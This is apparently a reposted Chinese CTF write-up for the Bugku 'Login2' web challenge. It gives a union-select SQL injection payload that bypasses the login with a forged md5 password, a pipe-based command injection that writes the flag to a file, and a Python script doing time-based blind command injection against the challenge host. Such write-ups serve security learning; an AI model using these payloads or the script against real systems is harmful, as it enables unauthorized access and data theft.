1. 首页
  2. 文章中心
  3. bugku题目wp

bugku上Login2

50 阅读 0 评论
我是靠谱客的博主 可爱白开水,最近开发中收集的这篇文章主要介绍bugku上Login2,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

1: 打开环境,是一个页面登陆界面,不能注册,破?union select绕过,

(有的师傅先sqlmap,发现啥啊也没有;python sqlmap.py -r sql.txt --level 5 --batch
–batch //选项不询问,全部按照默认,发现有注入点,然后爆它数据库--dbs,表--table,爆列名,得到id,username和password,在爆字段,发现是空的

2:那就打开bp,火狐(这里推荐)就不用去设置进行设置代理了

3:先在登录界面随便输入一些东西, admin,123,再进行抓包, 也可以用浏览器抓包,里面找到这个tip(还是人性的,没有难度)

tip: JHNxbD0iU0VMRUNUIHVzZXJuYW1lLHBhc3N3b3JkIEZST00gYWRtaW4gV0hFUkUgdXNlcm5hbWU9JyIuJHVzZXJuYW1lLiInIjsKaWYgKCFlbXB0eSgkcm93KSAmJiAkcm93WydwYXNzd29yZCddPT09bWQ1KCRwYXNzd29yZCkpewp9

 base64解码得

 审计一下:想要登录成功,可以 通过输入不存在用户,用union select 构造出指定密码的md5值这样

payload为username=admin' union select 1,md5(123)#&password=123   , 或者是这样的>Venus的md5值=0bdc508a17811a3a860d32749ad44e4b

username=Venus'union select 1,'0bdc508a17811a3a860d32749ad44e4b'#&password=Venus

(密码的md5值要等与你填的密码,我这里是123)

 4:图上就是绕过登录页面了,显示登陆成功,放包后就得到如图页面了

 我随便输了一些,ls, flag, 123|ls, Venus&ls, Venus;ls发现有些没有回显,会不会可能是过滤?

查了查,有可能是命令被过滤了,也有可能是命令执行了但输出过滤了

 他们做到这里用到脚本了,我整不出他们做出来的结果

5:利用管道符绕过,采用写入文件二次返回的方法查看结果

想了想,看看有没有flag的目录

在检测框输入123| cat /flag > test, 检测、然后直接查看test目录下的东西。得到flag{}

**##&&其实这个题我看很多人都是用到脚本了

 我跑了不过我是这样的:`ls`:css index.php login.php test。一样的我建议管道符做,被坑的经验

 也可能我哪里弄错了导致出不来他们说的那个fLag_~~~.txt,(index.php,login.php去掉)有的话就直接环境地址url/fLag_~~~.txt

就能成功访问到flag了

import requests
url = 'http://114.67.246.176:16619/index.php'
s = requests.session()
allString = '''1234567890~`!@#$%^&*()-_=+[]{};:'"|,<.>/?qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'''
database = ''
flag = 1
comm = input('输入指令:')
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Referer': 'http://114.67.246.176:16619/index.php',
}
cookies = dict(PHPSESSID='o6fnka50kbj2mh9u5k27paijd6')
for i in range(0, 100):
# 根据自身需要改长度,如果空格连续出现四次以上,就说明后续没内容了
for j in allString:
if j == "^":
j = " "
data = {'c': "123;a=`" + comm + "`;b=' ';if [ ${a:" + str(i) + ":1} == $b ];then sleep 4;fi"}
else:
data = {'c': "123;a=`" + comm + "`;b='" + str(j) + "';if [ ${a:" + str(i) + ":1} == $b ];then sleep 4;fi"}
r = requests.post(url, data=data, headers=headers, cookies=cookies)
t = r.elapsed.total_seconds()
# print(r.text)
print(database + j + ' 的时间'+ ' 是 ' + str(t))
if t >= 3:
database = database + j
print(str(i) + ' 为 ' + j)
break
elif t < 3 and j == 'M':
flag = 0
break
if flag == 0:
break
print('', database)

最后

以上就是可爱白开水为你收集整理的bugku上Login2的全部内容,希望文章能够帮你解决bugku上Login2所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(33)

相关文章

Bugku login2
Bugku login2
封神台靶场SQL注入——SQLmap简单使用
封神台靶场SQL注入——SQLmap简单使用
BugKu-CTF(web篇)---login2目录 login2 base64解码审计分析语句  制作payload
BugKu-CTF(web篇)---login2目录 login2 base64解码审计分析语句  制作payload
wp-Bugkuctf-web-38(sql注入)【附脚本】写在前面WP
wp-Bugkuctf-web-38(sql注入)【附脚本】写在前面WP
bugku上Login2
bugku上Login2
快节奏的多人游戏同步 - Part 4
快节奏的多人游戏同步 - Part 4
CTF-命令注入实验环境信息探测深入挖掘登录-利用exploit-db准备shell绕过防火墙 上传shell提权
CTF-命令注入实验环境信息探测深入挖掘登录-利用exploit-db准备shell绕过防火墙 上传shell提权
解决多人网络游戏同步问题的一个算法--The CMB Algorithm
解决多人网络游戏同步问题的一个算法--The CMB Algorithm

评论列表共有 0 条评论

立即
投稿
返回
顶部